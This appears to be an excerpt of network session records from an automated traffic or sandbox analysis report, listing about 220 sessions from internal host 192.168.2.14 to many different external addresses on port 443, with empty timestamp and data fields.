                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21422192.168.2.145158461.108.179.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21423192.168.2.1447742107.110.89.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21424192.168.2.1439528122.96.16.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21425192.168.2.144972637.6.124.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21426192.168.2.1437614206.236.14.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21427192.168.2.144040819.16.97.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21428192.168.2.145032417.5.127.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21429192.168.2.145271638.97.24.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21430192.168.2.145829051.56.32.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21431192.168.2.1440320117.148.71.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21432192.168.2.1452404189.255.53.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21433192.168.2.1457674178.98.251.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21434192.168.2.144769278.202.180.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21435192.168.2.146042036.233.54.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21436192.168.2.1459466121.11.178.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21437192.168.2.1460892185.88.176.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21438192.168.2.1452278168.17.214.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21439192.168.2.145962212.93.104.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21440192.168.2.1448632202.135.78.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21441192.168.2.144872693.126.240.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21442192.168.2.143971017.103.31.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21443192.168.2.143591066.220.137.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21444192.168.2.1435354211.176.228.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21445192.168.2.1435588115.95.120.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21446192.168.2.143839858.203.17.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21447192.168.2.144488895.192.30.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21448192.168.2.144514044.65.151.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21449192.168.2.144842873.208.70.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21450192.168.2.1439562135.63.153.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21451192.168.2.1443270212.33.52.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21452192.168.2.1442022159.194.73.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21453192.168.2.1447856132.121.208.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21454192.168.2.1434822113.95.100.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21455192.168.2.1438586190.53.82.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21456192.168.2.1451000216.243.116.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21457192.168.2.144446436.17.173.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21458192.168.2.1459708179.206.15.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21459192.168.2.1433722116.198.60.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21460192.168.2.1445702194.199.243.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21461192.168.2.143422620.7.172.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21462192.168.2.1446014220.240.172.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21463192.168.2.1436160156.66.131.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21464192.168.2.144637876.120.230.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21465192.168.2.1452226152.86.125.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21466192.168.2.1449802169.110.124.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21467192.168.2.1438450133.37.78.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21468192.168.2.14603841.109.130.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21469192.168.2.144242270.210.217.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21470192.168.2.1453148135.246.131.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21471192.168.2.1436094131.234.181.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21472192.168.2.1439304118.122.109.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21473192.168.2.1452236188.64.6.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21474192.168.2.1448260130.53.144.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21475192.168.2.1433610192.63.92.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21476192.168.2.1445624168.168.97.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21477192.168.2.144228451.247.232.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21478192.168.2.1441844193.147.55.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21479192.168.2.143294693.11.25.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21480192.168.2.144458838.121.108.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21481192.168.2.143633462.124.156.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21482192.168.2.144172618.135.10.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21483192.168.2.1441594115.207.10.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21484192.168.2.143290258.242.101.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21485192.168.2.1433760123.76.194.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21486192.168.2.1439928204.214.127.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21487192.168.2.1458040186.110.29.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21488192.168.2.1460172126.161.119.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21489192.168.2.1448436181.114.46.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21490192.168.2.145722623.58.212.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21491192.168.2.1440206157.248.77.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21492192.168.2.145667261.9.91.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21493192.168.2.143557466.146.2.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21494192.168.2.1454290211.56.118.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21495192.168.2.1433160198.112.17.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21496192.168.2.1438836180.179.242.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21497192.168.2.1460478200.183.173.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21498192.168.2.144299451.89.193.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21499192.168.2.1453174129.244.16.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21500192.168.2.144751477.23.100.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21501192.168.2.144973883.87.17.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21502192.168.2.1442554150.26.170.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21503192.168.2.1447750195.9.251.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21504192.168.2.1445468105.60.225.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21505192.168.2.145331095.163.52.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21506192.168.2.143303682.174.117.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21507192.168.2.14435885.59.114.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21508192.168.2.1439632198.210.63.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21509192.168.2.1456648164.124.201.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21510192.168.2.1433186211.71.200.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21511192.168.2.143985672.217.201.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21512192.168.2.1446846117.59.231.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21513192.168.2.1452580164.30.182.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21514192.168.2.143397036.210.148.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21515192.168.2.1451878162.147.8.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21516192.168.2.1447146167.218.73.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21517192.168.2.1439984196.204.233.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21518192.168.2.1436288147.246.134.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21519192.168.2.145074436.71.190.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21520192.168.2.145086454.135.191.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21521192.168.2.146034646.158.79.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21522192.168.2.1453874216.61.103.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21523192.168.2.1459116196.217.240.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21524192.168.2.145027447.45.24.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21525192.168.2.144513897.63.131.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21526192.168.2.144964639.56.122.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21527192.168.2.1452890166.222.74.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21528192.168.2.143438052.117.126.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21529192.168.2.145924436.252.175.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21530192.168.2.144238050.136.185.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21531192.168.2.1454384219.15.225.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21532192.168.2.145073225.49.125.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21533192.168.2.1437674109.20.172.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21534192.168.2.1437576201.62.157.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21535192.168.2.145926269.49.202.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21536192.168.2.1453170210.158.15.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21537192.168.2.1437304189.172.83.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21538192.168.2.1455642204.103.21.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21539192.168.2.1457234125.54.214.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21540192.168.2.1449796100.222.176.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21541192.168.2.14493248.60.52.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21542192.168.2.1436548103.45.29.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21543192.168.2.145703891.137.50.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21544192.168.2.1437766137.244.172.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21545192.168.2.1457508101.49.34.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21546192.168.2.145884292.107.124.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21547192.168.2.145808027.109.42.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21548192.168.2.1440052222.82.100.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21549192.168.2.1455076204.137.225.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21550192.168.2.1447172218.151.234.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21551192.168.2.1452258199.149.125.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21552192.168.2.1433578152.124.8.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21553192.168.2.1437138137.246.33.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21554192.168.2.146091462.217.174.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21555192.168.2.144315254.117.38.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21556192.168.2.1443912166.175.206.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21557192.168.2.1449480185.206.30.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21558192.168.2.1459922201.9.3.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21559192.168.2.1451308113.184.171.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21560192.168.2.145283662.202.203.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21561192.168.2.144968677.72.82.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21562192.168.2.1448054166.92.28.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21563192.168.2.1451996113.19.84.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21564192.168.2.143538679.71.173.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21565192.168.2.1443788191.130.247.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21566192.168.2.1434180158.163.155.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21567192.168.2.144309684.178.69.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21568192.168.2.143955031.86.197.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21569192.168.2.146017457.91.216.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21570192.168.2.145012825.35.162.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21571192.168.2.144154836.1.73.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21572192.168.2.1441384129.198.172.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21573192.168.2.1442296221.253.213.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21574192.168.2.1437714200.146.203.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21575192.168.2.1460996174.51.224.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21576192.168.2.144194687.103.60.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21577192.168.2.143623886.204.180.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21578192.168.2.1445368217.246.245.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21579192.168.2.1443136174.230.48.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21580192.168.2.1433496206.72.61.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21581192.168.2.143633096.166.216.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21582192.168.2.1458118223.20.82.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21583192.168.2.1436378116.195.139.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21584192.168.2.1452896102.218.89.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21585192.168.2.1456892105.203.145.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21586192.168.2.1438944149.161.185.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21587192.168.2.1458590195.17.204.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21588192.168.2.144048083.138.254.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21589192.168.2.143318059.216.175.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21590192.168.2.145025635.132.215.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21591192.168.2.1437828195.103.200.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21592192.168.2.1438780139.71.245.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21593192.168.2.144497280.118.24.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21594192.168.2.1458242126.184.88.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21595192.168.2.145653453.249.171.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21596192.168.2.146017285.97.204.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21597192.168.2.143386850.76.31.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21598192.168.2.1453396146.222.116.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21599192.168.2.14502625.184.82.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21600192.168.2.1433944207.157.37.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21601192.168.2.145976863.136.181.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21602192.168.2.1433764175.8.245.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21603192.168.2.145436412.220.214.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21604192.168.2.1436218222.207.127.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21605192.168.2.144902872.2.102.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21606192.168.2.1442034101.184.166.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21607192.168.2.143278267.24.199.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21608192.168.2.145409860.140.153.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21609192.168.2.145522848.243.224.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21610192.168.2.1434592122.105.74.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21611192.168.2.1460380162.90.60.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21612192.168.2.1444510182.69.213.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21613192.168.2.1458546209.186.85.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21614192.168.2.1441168129.153.130.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21615192.168.2.143493452.166.193.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21616192.168.2.1443902212.4.255.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21617192.168.2.145495259.83.1.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21618192.168.2.1454494167.215.130.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21619192.168.2.1437614201.35.62.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21620192.168.2.1456132207.32.129.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21621192.168.2.143888081.133.150.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21622192.168.2.144725461.173.101.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21623192.168.2.1456188216.114.110.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21624192.168.2.144458694.10.89.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21625192.168.2.1432836203.219.32.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21626192.168.2.1438696133.225.50.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21627192.168.2.1439626194.218.204.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21628192.168.2.1450282141.153.106.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21629192.168.2.1456828110.57.150.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21630192.168.2.1444258133.175.244.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21631192.168.2.1451934184.103.190.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21632192.168.2.145446275.170.4.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21633192.168.2.1460814129.119.135.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21634192.168.2.144771619.205.190.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21635192.168.2.1449598172.140.34.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21636192.168.2.144609457.48.62.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21637192.168.2.1439286167.71.150.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21638192.168.2.1445180165.222.200.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21639192.168.2.1460710165.163.154.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21640192.168.2.1433362131.181.214.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21641192.168.2.145504891.100.88.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21642192.168.2.1448594145.77.142.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21643192.168.2.1445928126.212.79.45443
